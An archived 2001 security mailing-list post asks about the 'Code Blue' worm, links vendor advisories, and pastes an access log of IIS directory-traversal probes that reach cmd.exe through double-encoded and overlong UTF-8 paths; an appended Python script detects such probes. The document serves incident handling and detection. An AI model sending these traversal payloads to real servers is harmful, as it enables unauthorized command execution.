Hi all,

Why have I not seen anything on this list about the "Code Blue" worm? I have received some alerts and news stories about a "Code Blue" worm:

http://www.infoworld.com/articles/hn/xml/01/09/07/010907hncodeblue.xml?0907alert
http://news.cnet.com/news/0-1003-200-7086783.html?tag=lh

A Chinese antivirus software company even has a cleanup tool for it at:

http://www.iduba.net/download/other/tool_010907_CodeBlue.htm

And other antivirus software companies now have virus definitions, explanations of the worm, and cleanup instructions:

http://www.sarc.com/avcenter/venc/data/w32.bluecode.worm.html
http://vil.mcafee.com/dispVirus.asp?virus_k=99202&
http://www.f-secure.com/v-descs/codeblue.shtml

Last, but not least, the FBI's Infragard program issued an advisory about it on September 10, 2001.

What is curious is the lack of discussion about it in a forum where I would expect to see it discussed. Does anyone have a signature for IDS, what it looks like in a web server access log, or packet captures of its file transfer activity?
I submit the following web server access log as a possible candidate based on its source in Asia, that it is a new pattern we have seen recently, and it matches with the reported infection method:

a.b.c.d - - [10/Sep/2001:20:45:12 -0700] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:45:18 -0700] "GET /scripts/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 305 "-" "-"
a.b.c.d - - [10/Sep/2001:20:45:20 -0700] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:45:24 -0700] "GET /cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:45:38 -0700] "GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207
a.b.c.d - - [10/Sep/2001:20:46:02 -0700] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207
a.b.c.d - - [10/Sep/2001:20:46:04 -0700] "GET /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:07 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:09 -0700] "GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:12 -0700] "GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:14 -0700] "GET /cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:18 -0700] "GET /cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:20 -0700] "GET /cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:22 -0700] "GET /cgi-bin/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:24 -0700] "GET /scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:26 -0700] "GET /scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:29 -0700] "GET /scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"

Does anyone know whether this is indicative of a Code Blue infected machine - or some other automated tool?

Michael Katz
mikeat_private
Responsible Solutions, Ltd.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
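As an added example (not part of the original post or of any vendor's signature), here is one way to pick such requests out of an Apache-format access log: the probes above all reach cmd.exe through "..", hidden behind double percent-encoding (%255c, %%35%63) or overlong UTF-8 forms of "/" and "\" (%c0%af, %c1%9c, %e0%80%af, %f0%80%80%af), so the detector normalizes those before matching. The sample log lines and source addresses are constructed for the example, modeled on the ones in the post.

```python
"""Flag IIS directory-traversal probes (the Code Blue / Code Red / Nimda family)
in Apache combined-format access logs. Added example, not the list's own tooling."""
import re
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)

# Overlong UTF-8 encodings of '/' (0x2F) and '\' (0x5C) seen in the posted log.
OVERLONG = {"%c0%af": "/", "%c1%9c": "\\", "%e0%80%af": "/", "%f0%80%80%af": "/"}


def normalize_uri(uri):
    """Undo overlong UTF-8 tricks and repeated percent-decoding so '..' and
    the path separator appear plainly, as the vulnerable server would see them."""
    u = uri.lower()
    for _ in range(3):  # %255c -> %5c -> '\'; bounded so odd input cannot loop forever
        for enc, ch in OVERLONG.items():
            u = u.replace(enc, ch)
        decoded = unquote(u)
        if decoded == u:
            break
        u = decoded
    return u.replace("\\", "/")


def is_traversal_probe(uri):
    """True when the normalized path climbs with '..' to reach cmd.exe."""
    path = normalize_uri(uri).split("?", 1)[0]
    return ".." in path and "cmd.exe" in path


def scan(lines):
    """Return {source_ip: [raw URIs]} for every traversal probe in the log."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_traversal_probe(m["uri"]):
            hits.setdefault(m["ip"], []).append(m["uri"])
    return hits


# Constructed sample log (addresses from RFC 5737 documentation ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Sep/2001:20:45:12 -0700] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 207 "-" "-"',
    '203.0.113.7 - - [10/Sep/2001:20:45:20 -0700] "GET /_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 207 "-" "-"',
    '203.0.113.7 - - [10/Sep/2001:20:46:18 -0700] "GET /cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 207 "-" "-"',
    '198.51.100.4 - - [10/Sep/2001:20:47:01 -0700] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for ip, uris in scan(SAMPLE_LOG).items():
        print(ip, len(uris), "traversal probes")
```

A single source issuing many differently encoded variants of the same cmd.exe request within a minute, as in the posted log, is the automated-scanner pattern worth alerting on rather than any one request.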
This archive was generated by hypermail 2b30 : Tue Sep 11 2001 - 21:17:31 PDT